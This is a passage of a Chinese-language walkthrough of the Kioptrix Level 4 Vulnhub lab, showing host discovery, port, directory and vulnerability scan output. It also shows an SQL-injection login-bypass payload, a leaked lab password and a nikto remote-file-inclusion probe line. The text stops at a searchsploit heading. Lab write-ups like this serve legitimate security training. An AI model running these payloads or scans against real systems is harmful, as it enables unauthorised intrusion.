免责声明
本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。
目录
- 免责声明
- 前言
- 一、环境配置
- 1.1 靶场信息
- 1.2 靶场配置
- 二、信息收集
- 2.1 主机发现
- 2.1.1 netdiscover
- 2.1.2 arp-scan主机扫描
- 2.2 端口扫描
- 2.3 指纹识别
- 2.4 目录扫描
- 2.4.1 dirb目录扫描
- 2.4.2 dirsearch目录扫描
- 2.5 漏洞切入点
- 2.5.1 访问首页
- 2.5.2 nmap漏洞扫描
- 2.5.3 nikto漏洞扫描
- 2.5.4 enum4linux漏洞扫描
- 2.5.5 wfuzz模糊测试
- 2.5.6 searchsploit搜索samba漏洞
- 三、渗透测试
- 3.1 SQL注入
- 3.1.1 Burp Suit抓登录包
- 3.1.2 爆破数据库
- 3.1.3 当前连接的数据库
- 3.1.4 连接的数据库的表名
- 3.1.5 字段名
- 3.1.6 用户名和密码
- 3.2 shell逃逸
- 3.2.1 ssh登录
- 3.2.2 shell逃逸
- 3.3 mysql udf提权
- 3.3.1 查看服务
- 3.3.2 php文件查找
- 3.3.3 查看php文件
- 3.3.4 登录mysql数据库
- 3.3.5 查看udf表
- 3.3.6 管理员用户组添加
- 3.3.7 切换超级管理员
- 3.3.8 flag
- 渗透总结
- 参考文章
前言
今日测试内容渗透Kioptrix Level #4靶机:
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍Kioptrix Level #4靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)、SQL注入、udf系统提权等内容。
Description
Back to the Top
Again a long delay between VMs, but that cannot be helped. Work, family must come first. Blogs and hobbies are pushed down the list. These things aren’t as easy to make as one may think. Time and some planning must be put into these challenges, to make sure that:
- It’s possible to get root remotely [ Edit: sorry not what I meant ]
1a. It’s possible to remotely compromise the machine
Stays within the target audience of this site
Must be “realistic” (well kinda…)
Should serve as a refresher for me. Be it PHP or MySQL usage etc. Stuff I haven’t done in a while.
I also had lots of troubles exporting this one. So please take the time to read my comments at the end of this post.
Keeping in the spirit of things, this challenge is a bit different than the others but remains in the realm of the easy. Repeating myself I know, but things must always be made clear: These VMs are for the beginner. It’s a place to start.
I’d would love to code some small custom application for people to exploit. But I’m an administrator not a coder. It would take too much time to learn/code such an application. Not saying I’ll never try doing one, but I wouldn’t hold my breath. If someone wants more difficult challenges, I’m sure the Inter-tubes holds them somewhere. Or you can always enroll in Offsec’s PWB course. *shameless plug
– A few things I must say. I made this image using a new platform. Hoping everything works but I can’t test for everything. Initially the VM had troubles getting an IP on boot-up. For some reason the NIC wouldn’t go up and the machine was left with the loopback interface. I hope that I fixed the problem. Don’t be surprised if it takes a little moment for this one to boot up. It’s trying to get an IP. Be a bit patient. Someone that tested the image for me also reported the VM hung once powered on. Upon restart all was fine. Just one person reported this, so hoping it’s not a major issue. If you plan on running this on vmFusion, you may need to convert the imagine to suit your fusion version.
– Also adding the VHD file for download, for those using Hyper-V. You guys may need to change the network adapter to “Legacy Network Adapter”. I’ve test the file and this one seems to run fine for me… If you’re having problems, or it’s not working for any reason email comms[=]kioptrix.com
Thanks to @shai_saint from www.n00bpentesting.com for the much needed testing with various VM solutions.
Thanks to Patrick from Hackfest.ca for also running the VM and reporting a few issues. And Swappage & @Tallenz for doing the same. All help is appreciated guys
So I hope you enjoy this one.
The Kioptrix Team
Source: http://www.kioptrix.com/blog/?p=604
Note: Just a virtual hard drive. You’ll need to create a new virtual machine & attach the existing hard drive
虚拟机之间再次存在很长的延迟,但这无济于事。 工作,家庭必须是第一位的。 博客和兴趣爱好排在列表的下方。 这些事情并不像人们想象的那么容易。 必须为这些挑战投入时间和一些计划,以确保:
1.可以远程获得root权限[编辑:对不起,我的意思不是]
1a. 可以远程破坏机器
1.停留在此网站的目标受众范围内
2.必须是“现实的”(好吧……)
3.应该为我复习。 无论是PHP还是MySQL用法等等。我已经有一段时间没做过了。
我也很难导出这个。 因此,请花时间阅读本文结尾处的评论。
秉承事物的精神,这一挑战与其他挑战有所不同,但仍处于轻松的境界。 我知道自己重复一遍,但必须始终清楚:这些VM是针对初学者的。 这是一个起点。
我很想编写一些小型的自定义应用程序,以供人们使用。 但我是管理员,不是编码员。 学习/编码这样的应用程序将花费太多时间。 并不是说我永远不会尝试做一个,但我不会屏住呼吸。 如果有人想要更艰巨的挑战,我敢肯定,Inter-tube会将他们抱在某个地方。 或者,您也可以随时注册Offsec的PWB课程。无耻的插头
– 我必须说几件事。 我使用新平台制作了这张图片。 希望一切正常,但我无法测试所有内容。 最初,VM在启动时很难获得IP。 由于某种原因,NIC无法启动,并且机器留有环回接口。 我希望我解决了这个问题。 如果这个启动需要一点时间,请不要感到惊讶。 它正在尝试获取IP。 有点耐心。 有人为我测试了映像,还报告说VM开机后就挂了。 重新启动后一切都很好。 只有一个人报告了此消息,因此希望这不是主要问题。 如果计划在vmFusion上运行它,则可能需要转换想象以适合您的融合版本。
– 还为使用Hyper-V的用户添加了VHD文件以供下载。 你们可能需要将网络适配器更改为“旧版网络适配器”。 我已经对该文件进行了测试,这个文件似乎对我来说还算不错…如果您遇到问题,或者由于某种原因它无法正常工作,请发送电子邮件comms [=]kioptrix.com
感谢www.n00bpentesting.com上的@shai_saint使用各种VM解决方案进行急需的测试。
感谢Hackfest.ca的Patrick也运行了VM并报告了一些问题。 Swappage和@Tallenz也这样做。 所有的帮助都是感激的家伙
所以我希望你喜欢这个。
Kioptrix团队
Note:只是一个虚拟硬盘。 您需要创建一个新的虚拟机并附加现有的硬盘驱动
一、环境配置
1.1 靶场信息
| 官方链接 | [https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) |
|---|---|
| 发布日期 | 2012年2月8日 |
| 靶场大小 | 208MB |
| 作者 | Kioptrix |
| 系列 | Kioptrix |
| 难度 | ★☆☆☆☆ |
1.2 靶场配置
- 渗透测试环境配置,请参考作者前面的内容vuInhub靶场实战系列-DC-2实战
- 【解决办法】- 靶机导入VMware后无法自动获取IP地址
- 建议将攻击机(kali)的网络模式设置为【桥接模式】
- VMware导入vmdk文件(亲测有效)
二、信息收集
2.1 主机发现
2.1.1 netdiscover
┌──(root㉿kali)-[/home/kali]
└─# netdiscover -r 192.168.1.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.6 00:0c:29:41:10:00 1 60 VMware, Inc.
192.168.1.13 ae:d5:7e:a8:51:6a 2 120 Unknown vendor
192.168.1.1 a0:54:f9:b3:23:54 2 120 Unknown vendor
2.1.2 arp-scan主机扫描
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.1.111
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.6 00:0c:29:41:10:00 VMware, Inc.
192.168.1.13 ae:d5:7e:a8:51:6a (Unknown: locally administered)
192.168.1.8 22:cb:7f:9b:2c:c1 (Unknown: locally administered)
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.388 seconds (107.20 hosts/sec). 3 responded
综上所述的2种扫描方式,获得靶机信息
IP地址:192.168.1.11
MAC地址:00:0c:29:b2:d4:13
2.2 端口扫描
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA Kioptrix4 192.168.1.6
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-12 08:34 EDT
Nmap scan report for 192.168.1.6
Host is up (0.00028s latency).
Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:41:10:00 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2024-06-12T16:34:31-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 9h59m59s, deviation: 2h49m42s, median: 7h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.34 seconds
综上所述,获得靶机开放的端口信息:
22端口:ssh服务
80端口:http服务
139端口:netbios-ssn
445端口:netbios-ssn
2.3 指纹识别
┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.1.6
WhatWeb report for http://192.168.1.6
Status : 200 OK
Title : <None>
IP : 192.168.1.6
Country : RESERVED, ZZ
Summary : Apache[2.2.8], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch], PasswordField[mypassword], PHP[5.2.4-2ubuntu5.6][Suhosin-Patch], X-Powered-By[PHP/5.2.4-2ubuntu5.6]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.2.8 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch (from server string)
[ PHP ]
PHP is a widely-used general-purpose scripting language
that is especially suited for Web development and can be
embedded into HTML. This plugin identifies PHP errors,
modules and versions and extracts the local file path and
username if present.
Version : 5.2.4-2ubuntu5.6
Module : Suhosin-Patch
Version : 5.2.4-2ubuntu5.6
Google Dorks: (2)
Website : http://www.php.net/
[ PasswordField ]
find password fields
String : mypassword (from field name)
[ X-Powered-By ]
X-Powered-By HTTP header
String : PHP/5.2.4-2ubuntu5.6 (from x-powered-by string)
HTTP Headers:
HTTP/1.1 200 OK
Date: Wed, 12 Jun 2024 20:38:05 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.6
Content-Length: 1255
Connection: close
Content-Type: text/html
获得关键信息;
- Apache[2.2.8],
- HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch],
- PasswordField[mypassword],
- PHP[5.2.4-2ubuntu5.6][Suhosin-Patch],
- X-Powered-By[PHP/5.2.4-2ubuntu5.6]
2.4 目录扫描
2.4.1 dirb目录扫描
┌──(root㉿kali)-[/home/kali]
└─# dirb http://192.168.1.6
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jun 12 08:40:08 2024
URL_BASE: http://192.168.1.6/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.6/ ----
+ http://192.168.1.6/cgi-bin/ (CODE:403|SIZE:326)
==> DIRECTORY: http://192.168.1.6/images/
+ http://192.168.1.6/index (CODE:200|SIZE:1255)
+ http://192.168.1.6/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.1.6/john/
+ http://192.168.1.6/logout (CODE:302|SIZE:0)
+ http://192.168.1.6/member (CODE:302|SIZE:220)
+ http://192.168.1.6/server-status (CODE:403|SIZE:331)
---- Entering directory: http://192.168.1.6/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.6/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Jun 12 08:40:33 2024
DOWNLOADED: 4612 - FOUND: 6
FOUND: 6,发现6个目录
- http://192.168.1.6/cgi-bin/
- http://192.168.1.6/index
- http://192.168.1.6/index.php
- http://192.168.1.6/logout
- http://192.168.1.6/member
- http://192.168.1.6/server-status
2.4.2 dirsearch目录扫描
┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.1.6 -e * -x 404,403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481
Output File: /home/kali/reports/_192.168.1.6/_24-06-12_08-40-50.txt
Target: http://192.168.1.6/
[08:40:50] Starting:
[08:41:17] 200 - 109B - /checklogin
[08:41:17] 200 - 109B - /checklogin.php
[08:41:22] 200 - 298B - /database.sql
[08:41:33] 301 - 350B - /images -> http://192.168.1.6/images/
[08:41:33] 200 - 930B - /images/
[08:41:40] 302 - 0B - /logout/ -> index.php
[08:41:40] 302 - 0B - /logout -> index.php
[08:41:42] 302 - 220B - /member/ -> index.php
[08:41:42] 302 - 220B - /member -> index.php
[08:41:42] 302 - 220B - /member/login -> index.php
[08:41:42] 302 - 220B - /member/admin.asp -> index.php
[08:41:42] 302 - 220B - /member/logon -> index.php
[08:41:42] 302 - 220B - /member/login.rb -> index.php
[08:41:42] 302 - 220B - /member/signin -> index.php
[08:41:42] 302 - 220B - /member/login.html -> index.php
[08:41:42] 302 - 220B - /member.php -> index.php
[08:41:42] 302 - 220B - /member/login.jsp -> index.php
[08:41:42] 302 - 220B - /member/login.asp -> index.php
[08:41:42] 302 - 220B - /member/login.py -> index.php
[08:41:42] 302 - 220B - /member/login.39772.zip -> index.php
Task Completed
测试结果显示,获得目录
2.5 漏洞切入点
2.5.1 访问首页
访问链接:
- http://192.168.1.6/
payload测试:- username:john
- password:1’ or ‘1’ =’ 1
2.5.2 nmap漏洞扫描
┌──(root㉿kali)-[/home/kali]
└─# nmap -A -v -sS -Pn -T4 --script=vuln 192.168.1.6
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-12 08:47 EDT
NSE: Loaded 150 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:47
Completed NSE at 08:47, 10.01s elapsed
Initiating NSE at 08:47
Completed NSE at 08:47, 0.00s elapsed
Initiating ARP Ping Scan at 08:47
Scanning 192.168.1.6 [1 port]
Completed ARP Ping Scan at 08:47, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:47
Completed Parallel DNS resolution of 1 host. at 08:47, 5.24s elapsed
Initiating SYN Stealth Scan at 08:47
Scanning 192.168.1.6 [1000 ports]
Discovered open port 22/tcp on 192.168.1.6
Discovered open port 139/tcp on 192.168.1.6
Discovered open port 445/tcp on 192.168.1.6
Discovered open port 80/tcp on 192.168.1.6
Completed SYN Stealth Scan at 08:47, 2.15s elapsed (1000 total ports)
Initiating Service scan at 08:47
Scanning 4 services on 192.168.1.6
Completed Service scan at 08:47, 11.02s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.6
NSE: Script scanning 192.168.1.6.
Initiating NSE at 08:47
Completed NSE at 08:54, 362.52s elapsed
Initiating NSE at 08:54
Completed NSE at 08:54, 0.09s elapsed
Nmap scan report for 192.168.1.6
Host is up (0.0010s latency).
Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-enum:
| /database.sql: Possible database backup
| /icons/: Potentially interesting folder w/ directory listing
| /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_ /index/: Potentially interesting folder
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.6
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.1.6:80/
| Form id: myusername
| Form action: checklogin.php
|
| Path: http://192.168.1.6:80/checklogin.php
| Form id:
| Form action: index.php
|
| Path: http://192.168.1.6:80/index.php
| Form id: myusername
|_ Form action: checklogin.php
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:41:10:00 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.019 days (since Wed Jun 12 08:27:20 2024)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=199 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
TRACEROUTE
HOP RTT ADDRESS
1 1.02 ms 192.168.1.6
NSE: Script Post-scanning.
Initiating NSE at 08:54
Completed NSE at 08:54, 0.00s elapsed
Initiating NSE at 08:54
Completed NSE at 08:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 393.04 seconds
Raw packets sent: 1450 (64.546KB) | Rcvd: 1226 (172.149KB)
2.5.3 nikto漏洞扫描
┌──(root㉿kali)-[/home/kali]
└─# nikto -h 192.168.1.6
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.1.6
+ Target Hostname: 192.168.1.6
+ Target Port: 80
+ Start Time: 2024-06-12 08:47:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ /: Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /database.sql: Server may leak inodes via ETags, header found with file /database.sql, inode: 148370, size: 298, mtime: Sat Feb 4 11:11:51 2012. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /database.sql: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2 - PHP 3/4/5 and 7.0 are End of Life products without support.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /database.sql: Database SQL found.
+ /icons/: Directory indexing found.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /member.php?vwar_root=http://blog.cirt.net/rfiinc.txt: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 1 error(s) and 22 item(s) reported on remote host
+ End Time: 2024-06-12 08:48:41 (GMT-4) (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
/database.sql: Database SQL found.
发现数据库文件
访问数据库文件:
- http://192.168.1.6/database.sql
发现用户:- 用户名:john
- 密码:1234
网页发现登录不了。
2.5.4 enum4linux漏洞扫描
┌──(root㉿kali)-[/home/kali]
└─# enum4linux 192.168..1.6
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 12 08:51:13 2024
=========================================( Target Information )=========================================
Target ........... 192.168..1.6
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 192.168..1.6 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 192.168..1.6 )================================
Looking up status of 0.0.0.0
No reply from 0.0.0.0
===================================( Session Check on 192.168..1.6 )===================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
┌──(root㉿kali)-[/home/kali]
└─# enum4linux 192.168.1.6
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun 12 08:55:42 2024
=========================================( Target Information )=========================================
Target ........... 192.168.1.6
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 192.168.1.6 )============================
[+] Got domain/workgroup name: WORKGROUP
================================( Nbtstat Information for 192.168.1.6 )================================
Looking up status of 192.168.1.6
KIOPTRIX4 <00> - B <ACTIVE> Workstation Service
KIOPTRIX4 <03> - B <ACTIVE> Messenger Service
KIOPTRIX4 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
MAC Address = 00-00-00-00-00-00
====================================( Session Check on 192.168.1.6 )====================================
[+] Server 192.168.1.6 allows sessions using username '', password ''
=================================( Getting domain SID for 192.168.1.6 )=================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
===================================( OS information on 192.168.1.6 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.1.6 from srvinfo:
KIOPTRIX4 Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
platform_id : 500
os version : 4.9
server type : 0x809a03
========================================( Users on 192.168.1.6 )========================================
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
==================================( Share Enumeration on 192.168.1.6 )==================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP KIOPTRIX4
[+] Attempting to map shares on 192.168.1.6
//192.168.1.6/print$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//192.168.1.6/IPC$ Mapping: N/A Listing: N/A Writing: N/A
============================( Password Policy Information for 192.168.1.6 )============================
[+] Attaching to 192.168.1.6 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] KIOPTRIX4
[+] Builtin
[+] Password Info for Domain: KIOPTRIX4
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
=======================================( Groups on 192.168.1.6 )=======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
===================( Users on 192.168.1.6 via RID cycling (RIDS: 500-550,1000-1050) )===================
[I] Found new SID:
S-1-5-21-2529228035-991147148-3991031631
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-2529228035-991147148-3991031631 and logon username '', password ''
S-1-5-21-2529228035-991147148-3991031631-501 KIOPTRIX4\nobody (Local User)
S-1-5-21-2529228035-991147148-3991031631-513 KIOPTRIX4\None (Domain Group)
S-1-5-21-2529228035-991147148-3991031631-1000 KIOPTRIX4\root (Local User)
================================( Getting printer info for 192.168.1.6 )================================
No printers returned.
enum4linux complete on Wed Jun 12 08:56:26 2024
2.5.5 wfuzz模糊测试
┌──(root㉿kali)-[/home/kali]
└─# wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.1.6/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.6/FUZZ
Total requests: 3024
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001629: 302 0 L 0 W 0 Ch "logout"
000001736: 302 1 L 22 W 220 Ch "member"
000002294: 301 9 L 31 W 350 Ch "robert"
000001458: 301 9 L 31 W 348 Ch "john"
000001350: 200 45 L 94 W 1255 Ch "index"
000001337: 301 9 L 31 W 350 Ch "images"
000000566: 403 10 L 33 W 326 Ch "cgi-bin/"
Total time: 5.687175
Processed Requests: 3024
Filtered Requests: 3017
Requests/sec.: 531.7226
2.5.6 searchsploit搜索samba漏洞
